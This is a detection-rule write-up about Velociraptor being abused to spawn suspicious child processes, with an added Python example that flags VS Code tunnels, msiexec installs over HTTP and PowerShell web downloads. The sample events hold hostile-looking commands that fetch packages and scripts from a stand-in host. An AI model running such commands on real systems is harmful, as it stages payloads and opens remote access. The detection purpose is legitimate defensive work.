
Summary
This detection rule identifies suspicious activity associated with the Velociraptor Digital Forensics and Incident Response (DFIR) tool, specifically when it spawns child processes that may indicate malicious behavior. The rule captures instances where Velociraptor, normally a legitimate administrative tool, executes other tools or downloads payloads, a technique seen in recent attack campaigns that leveraged the tool for remote access and further attack staging. By monitoring process creation originating from Velociraptor, the rule helps distinguish normal administrative usage from potential abuse. The detection criteria focus on specific child processes commonly associated with malicious use: Visual Studio Code tunnel commands, Windows Installer (msiexec) commands that reference HTTP resources, and PowerShell invocations related to web requests. The rule emphasizes the need to balance detection sensitivity against false positives, especially in environments where legitimate administrators may use Velociraptor in similar ways. Proper tuning and exclusion of known administrative actions are recommended to refine the accuracy of detections without raising unnecessary alerts.
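As an added example (not part of this rule page or the Velociraptor project), the following Python expresses the described criteria as detection logic and runs it over constructed Sysmon-style process-creation events. The parent-image match, the child command-line patterns and the exclusion list are assumptions about how the rule's criteria could be encoded, not the rule's actual implementation.

```python
import re

# Constructed Sysmon-style process-creation events (sample data, not from the page).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "msiexec.exe /i http://example.invalid/pkg.msi /qn"},
    {"parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "powershell.exe -nop -c Invoke-WebRequest http://example.invalid/a.ps1"},
    # Benign: Velociraptor running an ordinary PowerShell cmdlet (no web request).
    {"parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "powershell.exe -c Get-Service"},
    # Same msiexec pattern, but the parent is not Velociraptor: out of scope here.
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec.exe /i http://example.invalid/pkg.msi"},
]

# Parent filter plus the three child-process patterns the summary describes (assumed regexes).
PARENT_RE = re.compile(r"velociraptor", re.IGNORECASE)
CHILD_PATTERNS = {
    "vscode_tunnel": re.compile(r"\bcode(\.exe)?\b.*\btunnel\b", re.IGNORECASE),
    "msiexec_http": re.compile(r"\bmsiexec(\.exe)?\b.*\bhttps?://", re.IGNORECASE),
    "powershell_web": re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*"
        r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
        r"DownloadFile|Net\.WebClient|Start-BitsTransfer)", re.IGNORECASE),
}

def classify(event, exclusions=()):
    """Return the matching pattern name, or None if the event is not flagged.
    `exclusions`: regex strings for known administrative command lines (tuning step)."""
    if not PARENT_RE.search(event["parent"]):
        return None
    cmd = event["cmdline"]
    if any(re.search(ex, cmd, re.IGNORECASE) for ex in exclusions):
        return None
    for name, pattern in CHILD_PATTERNS.items():
        if pattern.search(cmd):
            return name
    return None

def detect(events, exclusions=()):
    """Run the rule over a batch of events; returns (pattern, command line) hits."""
    hits = []
    for event in events:
        name = classify(event, exclusions)
        if name:
            hits.append((name, event["cmdline"]))
    return hits
```

Passing a known administrative script path or URL as an exclusion suppresses that alert while the parent and pattern checks stay in force for everything else.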
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2025-08-29